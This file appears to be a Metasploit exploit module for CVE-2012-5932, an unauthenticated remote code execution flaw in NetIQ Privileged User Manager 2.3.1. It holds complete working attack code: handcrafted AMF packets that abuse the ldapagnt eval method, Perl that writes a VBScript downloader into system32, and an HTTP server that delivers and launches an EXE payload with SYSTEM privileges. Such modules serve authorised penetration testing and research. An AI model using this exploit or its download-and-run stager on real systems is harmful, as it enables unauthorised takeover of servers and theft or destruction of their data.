Path: blob/master/modules/exploits/windows/novell/netiq_pum_eval.rb
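##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Unauthenticated Perl code execution in NetIQ Privileged User Manager 2.3.1.
#
# Flow: a throw-away AMF login is sent to unifid.exe only to learn the "svc"
# value the service echoes back; a second AMF call then asks the ldapagnt
# module to eval() Perl that writes a VBScript downloader into
# %WINDIR%\system32 and runs it.  The VBScript fetches the EXE from the
# HttpServer mixin started by this module (plain HTTP, random path) and
# executes it.  Dropped files are removed through Meterpreter on session start.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution',
        'Description' => %q{
          This module abuses a lack of authorization in the NetIQ Privileged User Manager
          service (unifid.exe) to execute arbitrary perl code. The problem exists in the
          ldapagnt module. The module has been tested successfully on NetIQ PUM 2.3.1 over
          Windows 2003 SP2, which allows to execute arbitrary code with SYSTEM privileges.
        },
        'Author' => [
          'rgod', # Vulnerability discovery and PoC
          'juan vazquez' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2012-5932' ],
          [ 'OSVDB', '87334' ],
          [ 'BID', '56539' ],
          [ 'EDB', '22738' ]
        ],
        'Payload' => {
          'Space' => 2048,
          'StackAdjustment' => -3500
        },
        'Platform' => 'win',
        'Privileged' => true,
        'Targets' => [
          ['Windows 2003 SP2 / NetIQ Privileged User Manager 2.3.1', {}],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2012-11-15',
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_fs_delete_file
              stdapi_sys_config_getenv
            ]
          }
        }
      )
    )

    # SSL is shared by the HttpClient (requests to the target) and the HttpServer
    # (payload download); see start_payload_server for how that is reconciled.
    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the VBS payload request', 60])
      ]
    )

    self.needs_cleanup = true
  end

  # Fingerprints the service from its reply to a bogus login.
  #
  # @return [Exploit::CheckCode] Appears when the error text also carries the
  #   2.3.1 version string, Detected for any PUM-style login rejection, Safe otherwise.
  def check
    print_status('Sending fake login request...')
    res = send_amf(fake_login)

    return Exploit::CheckCode::Safe unless res && res.body.match?(/onResult/) && res.body.match?(/Invalid user name or password/)

    return Exploit::CheckCode::Appears if res.body.match?(/2\.3\.1/)

    Exploit::CheckCode::Detected
  end

  # Removes the dropped VBS/EXE once a session is up.
  #
  # FileDropper's generic cleanup is bypassed because the registered names are
  # relative to %WINDIR%\system32 (where the stager wrote them); the absolute
  # path is rebuilt here from the session's WINDIR.  Only Meterpreter sessions
  # are handled; on any other session type the files are left for the operator.
  def on_new_session(session)
    return unless session.type == 'meterpreter' && @dropped_files

    session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')

    begin
      windir = session.sys.config.getenv('WINDIR')
    rescue ::Rex::Post::Meterpreter::RequestError
      vprint_error('Could not resolve WINDIR on the session; dropped files were not removed')
      return
    end

    @dropped_files.delete_if do |file|
      # Block form of gsub so the single backslash is not treated as a
      # replacement-string escape.
      win_file = "#{windir}\\system32\\#{file.gsub('/') { '\\' }}"
      begin
        # fs.file.rm does not clear the read-only attribute itself, so do it first.
        session.shell_command_token(%(attrib.exe -r "#{win_file}"))
        session.fs.file.rm(win_file)
        print_good("Deleted #{file}")
        true
      rescue ::Rex::Post::Meterpreter::RequestError
        false # keep it in the list; removal failed
      end
    end
  end

  # HttpServer callback: hands the generated EXE to whoever requests the resource.
  #
  # No client check is performed, so the (random, short) path is the only thing
  # protecting the payload while the server is up; the wait in #exploit is bounded
  # by HTTP_DELAY to limit that window.
  def on_request_uri(cli, _request)
    vprint_status('on_request_uri called')

    unless @exe_data
      print_error("A request came in, but the EXE archive wasn't ready yet!")
      return
    end

    print_good('Sending the EXE payload to the target...')
    send_response(cli, @exe_data)
    @exe_sent = true
  end

  # Address the target should connect back to for the EXE download.
  #
  # @return [String] SRVHOST as configured, or, when SRVHOST is the IPv4
  #   wildcard 0.0.0.0, the local address that routes towards 50.50.50.50.
  #   NOTE(review): only '0.0.0.0' is special-cased; an IPv6 wildcard ('::')
  #   would be embedded in the download URL verbatim.
  def lookup_lhost
    return datastore['SRVHOST'] unless datastore['SRVHOST'] == '0.0.0.0'

    Rex::Socket.source_address('50.50.50.50')
  end

  # AMF0 login call (SPF.Util.callModuleEx, auth.login) with throw-away
  # credentials test/test.  Only the reply matters: it identifies the product
  # in #check and carries the "svc" value #exploit must echo back.
  #
  # @return [String] binary (ASCII-8BIT) request body
  def fake_login
    [
      "\x00\x00\x00\x00\x00\x01\x00\x15\x53\x50\x46\x2e\x55\x74", # ..........SPF.Ut
      "\x69\x6c\x2e\x63\x61\x6c\x6c\x4d\x6f\x64\x75\x6c\x65\x45\x78\x00", # il.callModuleEx.
      "\x02\x2f\x34\x00\x00\x00\x64\x0a\x00\x00\x00\x01\x03\x00\x03\x70", # ./4...d........p
      "\x6b\x74\x03\x00\x0b\x43\x72\x65\x64\x65\x6e\x74\x69\x61\x6c\x73", # kt...Credentials
      "\x03\x00\x04\x6e\x61\x6d\x65\x02\x00\x04\x74\x65\x73\x74\x00\x06", # ...name...test..
      "\x70\x61\x73\x73\x77\x64\x02\x00\x04\x74\x65\x73\x74\x00\x00\x09", # passwd...test...
      "\x00\x06\x6d\x65\x74\x68\x6f\x64\x02\x00\x05\x6c\x6f\x67\x69\x6e", # ..method...login
      "\x00\x06\x6d\x6f\x64\x75\x6c\x65\x02\x00\x04\x61\x75\x74\x68\x00", # ..module...auth.
      "\x03\x75\x69\x64\x06\x00\x00\x09\x00\x00\x09" # .uid.......
    ].join.b
  end

  # Posts one AMF message to the unifid.exe endpoint with the headers the Flash
  # client sends.
  #
  # @param data [String] AMF0 request body
  # @return [Rex::Proto::Http::Response, nil] the reply, or nil when none came back
  def send_amf(data)
    send_request_cgi(
      'uri' => '/',
      'version' => '1.1',
      'method' => 'POST',
      'ctype' => 'application/x-amf',
      'headers' => {
        'x-flash-version' => '11,4,402,278'
      },
      'data' => data
    )
  end

  # AMF0 length-prefixed name (object key / target URI): u16 big-endian byte
  # length followed by the bytes.
  def amf_key(name)
    [name.bytesize].pack('n') + name
  end

  # AMF0 string value: 0x02 type marker followed by a length-prefixed name.
  def amf_string(value)
    "\x02" + amf_key(value)
  end

  # Perl that, when eval'd by ldapagnt, writes a VBScript downloader into
  # %WINDIR%\system32 one `echo` at a time and then runs it.  The VBScript
  # fetches service_url with Microsoft.XMLHTTP, saves it via ADODB.Stream as
  # %WINDIR%\system32\<exename>.exe and launches it with WScript.Shell.
  #
  # @param vbs_stage [String] base name of the .vbs file
  # @param exename [String] base name of the .exe file
  # @param service_url [String] where the VBScript downloads the EXE from
  # @return [String] Perl source
  def build_stager(vbs_stage, exename, service_url)
    vbs_path = "%WINDIR%/system32/#{vbs_stage}.vbs"
    exe_path = "%WINDIR%\\system32\\#{exename}.exe"

    # Inner quotes stay escaped (\") because each line ends up inside a Perl
    # double-quoted system("...") argument.
    vbs_lines = [
      'Set F=CreateObject(\"Microsoft.XMLHTTP\")',
      "F.Open \\\"GET\\\",\\\"#{service_url}\\\",False",
      'F.Send',
      'Set IA=CreateObject(\"ADODB.Stream\")',
      'IA.Type=1',
      'IA.Open',
      'IA.Write F.responseBody',
      "IA.SaveToFile \\\"#{exe_path}\\\",2",
      "CreateObject(\\\"WScript.Shell\\\").Run \\\"#{exe_path}\\\""
    ]

    # First echo creates the file (>), the rest append (>>).
    perl = vbs_lines.each_with_index.map do |line, index|
      redirect = index.zero? ? '>' : '>>'
      "system(\"echo #{line} #{redirect}#{vbs_path}\");"
    end.join
    perl << "system(\"#{vbs_stage}.vbs\");"
    perl
  end

  # AMF0 call to SPF.Util.callModuleA asking the ldapagnt module to eval `code`.
  #
  # Argument layout (one object in a strict array):
  #   { pkt: { method: "eval", module: "ldapagnt", Eval: { content: code } },
  #     uid: "", svc_name: svc_name }
  #
  # @param code [String] Perl source to evaluate
  # @param svc_name [String] value recovered from the login reply
  # @return [String] binary (ASCII-8BIT) request body
  def build_eval_packet(code, svc_name)
    data = ''.b
    data << "\x00\x00\x00\x00\x00\x01"                 # AMF0: version 0, no headers, one message
    data << amf_key('SPF.Util.callModuleA')            # target URI
    data << "\x00\x00"                                 # response URI (empty)
    # Presumably the AMF message length; kept at the PoC's fixed value rather
    # than recomputed — TODO confirm the service really ignores it.
    data << "\x00\x00\x02\x0a"
    data << "\x0a\x00\x00\x00\x01"                     # strict array, one element
    data << "\x03"                                     # argument object
    data << amf_key('pkt') << "\x03"
    data << amf_key('method') << amf_string('eval')
    data << amf_key('module') << amf_string('ldapagnt')
    data << amf_key('Eval') << "\x03"
    # "\n\n1;" makes the eval'd chunk return true; the declared string length
    # covers code plus one copy, and a second copy follows it as in the PoC.
    data << amf_key('content') << amf_string(code + "\x0a\x0a1;") << "\x0a\x0a1;"
    data << "\x00\x00\x09"                             # end Eval
    data << "\x00\x00\x09"                             # end pkt
    data << amf_key('uid') << amf_string('')
    data << amf_key('svc_name') << amf_string(svc_name)
    data << "\x00\x00\x09"                             # end argument object
    data
  end

  # Starts the HttpServer that serves the EXE on resource_uri.
  #
  # HttpServer and HttpClient read the same SSL datastore option and the VBS
  # stager downloads over plain HTTP, so SSL is switched off only while the
  # server starts and the operator's value is restored afterwards — the
  # follow-up AMF request must still honour it.
  def start_payload_server(resource_uri)
    ssl_setting = datastore['SSL']
    datastore['SSL'] = false
    begin
      start_service(
        'Uri' => {
          'Proc' => proc { |cli, req| on_request_uri(cli, req) },
          'Path' => resource_uri
        }
      )
    ensure
      datastore['SSL'] = ssl_setting
    end
  end

  # Runs the attack: learn svc_name from a fake login, start the EXE server,
  # send the eval request, then wait up to HTTP_DELAY seconds for the download.
  #
  # @raise [Msf::Exploit::Failed] via fail_with when the login reply is unusable,
  #   the eval call unexpectedly answers, or the target never fetches the EXE.
  def exploit
    print_status('Sending fake login request...')
    res = send_amf(fake_login)
    svc_match = res && res.code == 200 ? res.body.match(/svc(.+)/) : nil
    fail_with(Failure::Unknown, 'Fake Login failed, svc not identified') unless svc_match

    # The bytes after "svc" look like an AMF0 string: a type byte, a u16
    # big-endian length at offset 1, then the name — the parse below assumes
    # that layout and bails out instead of raising on a truncated capture.
    svc = svc_match[1]
    fail_with(Failure::Unknown, 'Fake Login failed, svc value too short to parse') if svc.bytesize < 3

    svc_name = svc[3, svc[1, 2].unpack('n').first]
    fail_with(Failure::Unknown, 'Fake Login failed, empty svc name') if svc_name.nil? || svc_name.empty?
    vprint_status("SVC Found: #{svc_name}")

    print_status('Generating the EXE Payload...')
    @exe_data = generate_payload_exe
    @exe_sent = false # reset so a re-run of the module does not skip the wait below
    exename = Rex::Text.rand_text_alpha(1 + rand(2))

    print_status('Setting up the Web Service...')
    resource_uri = "/#{exename}.exe"
    service_url = "http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_uri}"
    print_status("Starting up our web service on #{service_url} ...")
    start_payload_server(resource_uri)

    # http://scriptjunkie1.wordpress.com/2010/09/27/command-stagers-in-windows/
    vbs_stage = Rex::Text.rand_text_alpha(3 + rand(5))
    code = build_stager(vbs_stage, exename, service_url)
    # Names are relative to %WINDIR%\system32; on_new_session resolves them.
    register_file_for_cleanup("#{vbs_stage}.vbs")
    register_file_for_cleanup("#{exename}.exe")

    print_status('Sending the eval code request...')
    res = send_amf(build_eval_packet(code, svc_name))

    # A successful eval leaves the request unanswered; any reply means it failed.
    if res
      fail_with(Failure::Unknown, 'There was an unexpected response to the code eval request')
    else
      print_good("There wasn't a response, but this is the expected behavior...")
    end

    print_status('Waiting for the victim to request the EXE payload...')
    waited = 0
    until @exe_sent
      if waited > datastore['HTTP_DELAY']
        fail_with(Failure::Unknown, "Target didn't request the EXE payload -- Maybe it can't connect back to us?")
      end
      Rex.sleep(1)
      waited += 1
    end

    print_status('Giving time to the payload to execute...')
    Rex.sleep(20)
  end
end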